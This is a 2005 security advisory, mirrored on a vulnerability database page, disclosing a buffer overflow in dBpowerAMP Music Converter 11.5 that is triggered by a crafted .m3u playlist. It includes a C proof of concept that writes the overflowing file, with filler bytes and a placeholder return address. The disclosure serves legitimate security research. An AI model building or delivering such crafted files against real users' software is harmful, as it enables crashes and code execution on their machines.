Lucene search

K

dBpowerAMPv11.5.txt

🗓️ 29 Dec 2005 00:00:00Reported by fRoGGzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 33 Views

dBpowerAMP Music Converter v11.5 Local Buffer Overflow Issue due to malicious playlist fil

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`dBpowerAMP Music Converter v11.5 and priors Local Buffer Overflow Issue  
Original: http://secubox.shadock.net/dBpowerAMP_Music_Converter_v11.5_Local_Buffer_Overflow_Issue.html  
  
  
VULNERABLE PRODUCT  
-----------------------------------  
Software: dBpowerAMP Music Converter  
Corporation: Illustrate  
Release: 11.5 and priors.  
------------------------------------  
  
  
BACKGROUND  
--------------------  
Often called the Swiss army knife of audio, dMC can digitally rip sound from audio CDs to a multitude of formats. Convert from one format to another while preserving ID tags. Nearly every audio type is supported, including MP3, MP4, Windows Media Audio, OGG Vorbis, AAC, Monkey's Audio, FLAC, ...  
It works from the Windows Explorer right click menu, where it provides quick access to one-click conversion  
as well as a new pop-up info box that displays detailed file information for supported formats.  
In addition, you can use dBpowerAMP to extract (rip) files from a CD, featuring automatic CDDB support.  
CD Ripping is very fast and according to the developer s tests it claims to be the fastes around.  
  
  
DESCRIPTION  
--------------------  
A malicious playlist file format ".m3u" file can generate a local exploitation of a buffer overflow  
and allows attackers to execute arbitrary code under the context of the user who started the process.  
  
  
PROOF OF CONCEPT  
--------------------------------  
Build & mouse over the file or open it ... as you want.  
  
  
  
/*  
Illustrate dBpowerAMP dMCShell Module Buffer Overflow  
Date: 23 December, 2005  
Credits: SecuBox Labs  
Discovered by: fRoGGz  
*/  
  
#include <stdio.h>  
  
char SecuBox[]=  
"\x3A\x20\x53\x65\x63\x75\x42\x6F\x78\x20\x4C\x61\x62\x73\x20\x3A"  
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"  
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"  
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"  
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"  
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"  
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"  
"\x2D\x2D\x5B\x20\x32\x36\x30\x20\x20\x42\x6F\x46\x20\x5D\x2D\x2D"  
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"  
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"  
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"  
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"  
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"  
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"  
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"  
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"  
"\xFF\xFF\xFF\xFF\x90\x90\x90\x90"  
"\x41\x41\x41\x41"; // AAAA ...  
  
int main(int argc, char* argv[]) {  
FILE *fp;  
  
printf ("SecuBox Labs - Proof Of Concept\n");  
printf ("Illustrate dBpowerAMP dMCShell Module Buffer Overflow\n\n");  
  
fp = fopen ("SecuBox.Labs.m3u","w+");  
if (!fp) {  
printf (" fopen error.\n");  
return -1;  
}  
  
fwrite (SecuBox, 1, strlen(SecuBox) , fp);  
fclose (fp);  
  
printf ("SecuBox.Labs.m3u created.\n");  
return 0;  
  
}  
  
  
  
CREDiTS  
----------------------  
SecuBox Labs - fRoGGz  
Visit: http://secubox.shadock.net  
--------------------------------------------------  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
--   
___________________________________________________  
Play 100s of games for FREE! http://games.mail.com/  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo